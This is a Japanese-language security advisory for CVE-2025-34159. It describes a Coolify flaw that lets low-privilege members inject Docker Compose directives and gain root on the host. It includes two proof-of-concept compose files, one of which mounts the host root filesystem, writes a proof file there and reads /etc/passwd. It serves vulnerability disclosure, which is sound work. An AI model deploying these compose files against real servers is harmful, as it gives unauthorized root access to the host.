
Coolifyのアプリケーション展開ワークフローに重大なリモートコード実行(RCE)脆弱性が存在します。この欠陥により、低権限のメンバーがプロジェクト作成または更新中に任意のDocker Composeディレクティブを注入できます。ホストファイルシステムをマウントする悪意のあるサービスを定義することで、攻撃者はルートレベルのコマンド実行を達成できます。
| フィールド | 値 |
|---|---|
| CVE ID | CVE-2025-34159 |
| 影響を受けるバージョン | Coolify ≤ v4.0.0-beta.420.6 |
| 修正バージョン | v4.0.0-beta.420.7 |
| 深刻度 | 重大 |
| CVSS 4.0 | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| CWE | CWE-78 (OSコマンドインジェクション), CWE-20 (不適切な入力検証) |
Coolify のアプリケーションデプロイワークフローには、重大なリモートコード実行 (RCE) の脆弱性が存在します。この欠陥により、低権限のメンバーがプロジェクトの作成または更新時に任意のDocker Compose ディレクティブを注入できます。ホストファイルシステムをマウントする悪意のあるサービスを定義することで、攻撃者はコンテナの隔離を完全にバイパスして、ホスト OS 上で root レベルのコマンド実行を達成できます。
この脆弱性は、ユーザーが提供した Docker Compose 構成が十分な検証やサンドボックス化なしに処理されるプロジェクトデプロイワークフローに存在します。
version: '3.8'
services:
poc-host-root:
image: alpine:3.19
tty: true
volumes:
- /:/host:rw
command: >
sh -c "
echo '[*] Proof of RCE on host' &&
echo 'RCE by Eyodav' > /host/tmp/proof_rce.txt &&
whoami &&
id &&
uname -a &&
head -n 5 /host/etc/passwd
"
結果: デプロイ後、/tmp/proof_rce.txt がホストシステム上に作成され、root 権限による RCE が確認されます。
version: '3.8'
services:
poc-host-write:
image: alpine:3.19
tty: true
volumes:
- /home/eyodav/PoC:/host
command: >
sh -c "
set -e;
mkdir -p /host &&
echo '[*] Writing PoC file to host mount...' &&
echo RCE_PoC_from_container_$(date) > /host/RCE_PoC.txt &&
cd /host &&
pwd &&
ls -la
"
/tmp/proof_rce.txt)を確認するか、デプロイログのコマンド出力をレビューして悪用を検証する